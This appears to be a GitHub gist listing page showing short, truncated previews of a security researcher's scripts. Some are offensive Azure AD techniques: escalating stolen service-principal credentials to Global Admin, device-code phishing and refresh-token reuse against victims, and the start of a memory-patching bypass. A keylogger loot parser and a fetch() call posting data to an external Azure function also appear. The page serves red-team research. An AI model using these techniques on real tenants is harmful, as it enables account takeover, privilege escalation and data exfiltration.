This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
:: NOTE: If you don't want to make proxy settings for the whole machine, | |
:: find the line in this script that starts with "reg add" and change | |
:: "HKLM" to "HKCU" so that it only affects the current user (or change it | |
:: to reflect the specific hive that you want to change) | |
:: Supported Characters in proxy server address (if you need more, consult | |
:: an ascii table and make a new "if" statement for the character you need, | |
:: but these should suffice): | |
:: * - . / : ; = ? @ ~ < > | |
:: All Numbers |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Author: Marius Elmiger (@m8r1us) | |
# Description: Use extracted DevOps Credentials from a Service Principal to grant Global Admin rights by chaining AppRoleAssignment.ReadWrite.All with RoleManagement.ReadWrite.Directory | |
# | |
# The script includes code from from https://gist.github.com/andyrobbins/7e52f6fe255a2dcadb69745dc8640441#file-api-abuse-to-ga-ps1 (@_wald0) | |
# 1 The Azure AD User I want to add to GA Role (objectid) | |
$userToAddToGa = "3bffb11a-b991-4d1f-....." | |
# 2 Extracted information from Azure DevOps | |
$applicationId = "64396535663062302D666163392D....." |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Author: Marius Elmiger (@m8r1us) | |
# Description: Script to automate the Azure AD Device Code Flow | |
# Define an Azure AD Application from which you want to connect in the name of the victim to a resource | |
# client_id = Microsoft Office App | |
# resource = Microsoft Graph | |
$body=@{ | |
"client_id" = "d3590ed6-52b3-4102-aeff-aad2292ab01c" | |
"resource" = "https://graph.microsoft.com" | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$MethodDefinition = @" | |
[DllImport(`"kernel32`", EntryPoint="GetProcAddress")] | |
public static extern IntPtr GetProc(IntPtr hModule, string procName); | |
[DllImport(`"kernel32`")] | |
public static extern IntPtr GetModuleHandle(string lpModuleName); | |
[DllImport(`"kernel32`",EntryPoint="VirtualProtect" )] | |
public static extern bool Virtual(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); | |
"@; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Author: Marius Elmiger (@m8r1us) | |
# Description: Simple KeyCroc croc_char.log analysis script | |
# Croc_char.log location | |
$file = "C:\tmp\croc_char.log" | |
$content = Get-Content $file | |
# Format Loot file with line breaks | |
$modifiedText = $content -replace '(\[[^\]]+\])', "`n`$1`n" | |
$modifiedText = $modifiedText -replace "`n{2,}", "`n" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"nodes": [ | |
{ | |
"id": "n0", | |
"position": { | |
"x": 1239.9485302406829, | |
"y": 11.014798303606455 | |
}, | |
"caption": "Domain Controller", | |
"labels": [], |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html xmlns="http://www.w3.org/1999/xhtml"> | |
<head> | |
<title>File Uploader</title> | |
<script> | |
/*! | |
* jQuery JavaScript Library v1.7.1 | |
* http://jquery.com/ | |
* | |
* Copyright 2011, John Resig |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Define an Azure AD Application from which you want to connect in the name of the victim to a resource | |
#client_id = Microsoft Office App | |
#resource = Microsoft Graph | |
$body=@{ | |
"client_id" = "d3590ed6-52b3-4102-aeff-aad2292ab01c" | |
"resource" = "https://graph.microsoft.com" | |
} | |
#Define an UserAgent that is widely used | |
$UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
fetch('https://name.azurewebsites.net/api/HttpTrigger1', { | |
method: 'POST', | |
body: "<yourcontent>", | |
headers: {'x-functions-key': 'key'} | |
}); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$TenantId = "" | |
$authUrl = "https://login.microsoftonline.com/$($TenantId)" | |
$body = @{ | |
"scope" = "https://management.azure.com/.default offline_access openid" | |
"client_id" = "d3590ed6-52b3-4102-aeff-aad2292ab01c" | |
"grant_type" = "refresh_token" | |
"refresh_token" = "" | |
} |
OlderNewer